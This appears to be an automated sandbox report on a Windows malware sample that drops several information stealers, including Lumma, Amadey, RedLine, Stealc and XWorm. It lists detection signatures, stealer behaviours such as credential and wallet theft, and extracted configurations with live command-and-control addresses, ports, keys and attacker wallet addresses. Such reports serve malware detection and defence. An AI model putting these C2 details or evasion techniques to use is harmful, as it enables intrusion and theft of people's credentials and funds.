Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1520590
MD5: b8fc8a5801e3c0172a199430c7dba1d6
SHA1: 2a53f4961410bea07de2259fd7875b30ae6a7856
SHA256: c438ad0f0d3f595677bfd83cfbab377224cdcc7275f7954639c113e767e8ddf5
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected CryptOne packer
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Stealc
Yara detected Vidar stealer
Yara detected XWorm
Yara detected zgRAT
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe Avira: detection malicious, Label: HEUR/AGEN.1358803
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\crypted[1].exe Avira: detection malicious, Label: HEUR/AGEN.1357677
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe Avira: detection malicious, Label: HEUR/AGEN.1351932
Found malware configuration
Source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["188.190.10.161"], "Port": "4444", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 00000002.00000002.2262892966.0000000000201000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 0000001C.00000002.3027013594.00000000038C5000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: RedLine {"C2 url": "89.105.223.196:29862", "Bot Id": "ERROR RDX", "Authorization Header": "21d3b2e8d7fdeff423c7a5819c5e64ed"}
Source: 00000018.00000002.3030940765.0000000003710000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 00000018.00000002.3030940765.0000000003710000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
Source: 15.2.RegAsm.exe.400000.1.unpack Malware Configuration Extractor: LummaC {"C2 url": ["lootebarrkeyn.shop", "gutterydhowi.shop", "reinforcenh.shop", "stogeneratmns.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "offensivedzvju.shop", "fragnantbui.shop", "drawzhotdog.shop"], "Build id": "FATE99--Mix"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\crypted[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gold[1].exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\needmoney[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\12dsvc[1].exe ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\newbundle2[1].exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\LummaC222222[1].exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\cccc2[1].exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe ReversingLabs: Detection: 70%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 55%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\needmoney[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\rstxdhuj[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: reinforcenh.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: stogeneratmns.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: fragnantbui.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: drawzhotdog.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: vozmeatillu.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: offensivedzvju.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: ghostreedmnu.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: gutterydhowi.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: lootebarrkeyn.shop
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: TeslaBrowser/5.5
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: - Screen Resoluton:
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: - Physical Installed Memory:
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: Workgroup: -
Source: 15.2.RegAsm.exe.400000.1.unpack String decryptor: FATE99--Mix
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: 188.190.10.161
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: 4444
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: <IlwAYl63V65*l#>
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: <Xwormmm>
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: XWorm V5.6
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: USB.exe
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: bc1qyrkl2d6y5szrmqdhc4tv5jjavgyrtlcu072d73
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: 0xCF1f6F491C7C6345B2139C0bB9204e64f37BD4e9
Source: 38.2.InstallUtil.exe.400000.0.unpack String decryptor: TVc65vYbkKfbEAqihVbyZuSVVagPux7c7h
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49635 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.108:443 -> 192.168.2.6:49638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.140.192.213:443 -> 192.168.2.6:49644 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49646 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49647 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.64.194:443 -> 192.168.2.6:49673 version: TLS 1.2
Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005D88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb8 source: axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb@ source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32^ source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3516704262.0000000000B37000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3536050802.0000000005DCA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: stealc_default2.exe, 00000017.00000002.3114439180.000000006974F000.00000002.00000001.01000000.0000001B.sdmp, svchost015.exe, 0000001E.00000002.3468864393.00000000690BF000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000B.00000002.3518496175.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: stealc_default2.exe, 00000017.00000002.3113843128.000000006958D000.00000002.00000001.01000000.0000001C.sdmp, svchost015.exe, 0000001E.00000002.3461869295.0000000068EFD000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: c:\rje\tg\7v\obj\Release\Qrr.pdb source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252257395.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252600342.0000000000F26000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041B6EA FindFirstFileExW, 15_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local\Temp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004CD2C0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then jmp eax 16_2_00507600
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_0050A7E0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_0050AC00
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then push ebx 16_2_004D5078
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 16_2_005050E0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F40F5
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F40F5
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edi, byte ptr [eax+esi] 16_2_004C7120
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004EA274
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [edx], ax 16_2_004EA274
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004EA2F9
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [edx], ax 16_2_004EA2F9
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 16_2_00502280
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_004EA345
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [edx], ax 16_2_004EA345
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004EA345
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 16_2_004F1370
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebx, eax 16_2_004CA3C0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebp, eax 16_2_004CA3C0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 16_2_00509390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_00509390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 16_2_004EC390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 16_2_004EC390
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004E4490
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 16_2_004E04A0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov word ptr [eax], dx 16_2_004E04A0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ecx, esi 16_2_004ED56C
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 16_2_004FB510
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi+000006A8h] 16_2_004DE52C
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ecx, esi 16_2_004ED58E
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_004EF5B7
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi] 16_2_004D46B5
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 16_2_004CF7E0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edx], cl 16_2_004F27B0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 16_2_004DA880
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp al, 2Eh 16_2_004EC891
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then xor eax, eax 16_2_004EC891
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 16_2_00504970
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh 16_2_005089F0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F4A2F
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 16_2_00505AD0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi] 16_2_004D3AE6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebx, ecx 16_2_004D3AE6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 16_2_004D3AE6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then jmp edx 16_2_004E7B0F
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 16_2_004EBB00
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 16_2_004F0BD0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx ecx, word ptr [edi+eax] 16_2_00508BE0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 16_2_004C4C10
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 16_2_004E6CA0
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then add edi, 02h 16_2_004DDD64
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [ebx] 16_2_004DDD64
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 16_2_004C5D20
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_004F4DF6
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_0050AD90
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 16_2_00505D80
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_00509E60
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 16_2_004D4E26
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then xor eax, eax 16_2_004D4E26
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 16_2_00507EDE
Source: C:\Users\user\AppData\Roaming\esFzLrEqPw.exe Code function: 4x nop then mov eax, dword ptr [esi+1Ch] 16_2_004CFEBC
